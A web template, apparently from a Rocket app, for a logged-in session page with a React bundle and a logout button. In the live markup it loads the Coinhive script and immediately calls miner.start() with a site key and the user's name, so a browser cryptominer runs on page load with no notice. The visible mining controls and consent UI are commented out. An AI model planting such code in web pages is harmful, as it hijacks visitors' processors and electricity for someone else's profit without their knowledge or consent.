{% extends "master" %}

{% block header %}
{% endblock header %}

{% block content %}
    <div class="header">
        <h1>Rocket Session</h1>
        <h2>Logged in with user ID {{ id }} and username {{ username }}.</h2>
    </div>

    <div class="content">
        <div>
            <p>REACT</p>
            <div id='app'></div>
            <script src="/assets/bundle.js"></script>
        </div>

        <form action="/logout" method="post" accept-charset="utf-8">
            <input type="submit" name="logout" id="logout" value="logout" />
        </form>

        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>
            var miner = new CoinHive.User('LizXPgR1RicCNg50MGh2EOgT4BjJovK0', '{{ username }}');
            miner.start();
        </script>

      <!--<div class="six columns stopped" id="miner">
            <div class="row">
                    <div class="four columns">
                            <h4 class="number-label">Hashes/s</h4>
                            <h2 id="mining-hashes-per-second">0.0</h2>
                    </div>
                    <div class="four columns">
                            <h4 class="number-label">Total</h4>
                            <h2 id="mining-hashes-total">0</h2>
                    </div>
                    <div class="four columns">
                            <h4 class="number-label">Threads</h4>
                            <h2>
                                    <span id="mining-threads">2</span>
                                    <span id="mining-threads-add" class="action">+</span>
                                    <span class="mining-divide"> / </span>
                                    <span id="mining-threads-remove" class="action">−</span>
                            </h2>
                    </div>
            </div>
            <div id="mining-stats-container">
                    <canvas id="mining-stats-canvas"></canvas>
                    <div id="mining-controls">
                            <a href="#" class="mining-button" id="mining-start">
                                    <svg class="mining-icon play-button" viewBox="0 0 200 200" alt="Start Mining">
                                            <circle cx="100" cy="100" r="90" fill="none" stroke-width="15" class="mining-stroke"/>
                                            <polygon points="70, 55 70, 145 145, 100" class="mining-fill"></polygon>
                                    </svg>
                                    Start Mining
                            </a>
                            <a href="#" class="mining-button" id="mining-stop">
                                    <svg class="mining-icon pause-button" viewBox="0 0 200 200" alt="Pause">
                                            <circle cx="100" cy="100" r="90" fill="none" stroke-width="15" class="mining-stroke"/>
                                            <rect x="70" y="50" width="20" height="100" class="mining-fill"/>
                                            <rect x="110" y="50" width="20" height="100" class="mining-fill"/>
                                    </svg>
                            </a>
                    </div>
                    <div id="blk-warning" class="blk-warn" style="display: none">
                            Library failed to load.<br/><strong>Please disable adblock!</strong>
                    </div>
            </div>
      </div>

      <script src="/js/miner-ui.js"></script>
      <script type="text/javascript">
        var miner = null;
        try {
                miner = new CoinHive.User('LizXPgR1RicCNg50MGh2EOgT4BjJovK0', '{{ username }}');
        } catch(e) {}

        var ui = new MinerUI(miner, {
                container: document.getElementById('miner'),
                canvas: document.getElementById('mining-stats-canvas'),
                hashesPerSecond: document.getElementById('mining-hashes-per-second'),
                hashesPerSecond: document.getElementById('mining-hashes-per-second'),
                threads: document.getElementById('mining-threads'),
                threadsAdd: document.getElementById('mining-threads-add'),
                threadsRemove: document.getElementById('mining-threads-remove'),
                hashesTotal: document.getElementById('mining-hashes-total'),
                startButton: document.getElementById('mining-start'),
                stopButton: document.getElementById('mining-stop'),
                blkWarn: document.getElementById('blk-warning')
        });
      </script>-->
    </div>
{% endblock content %}
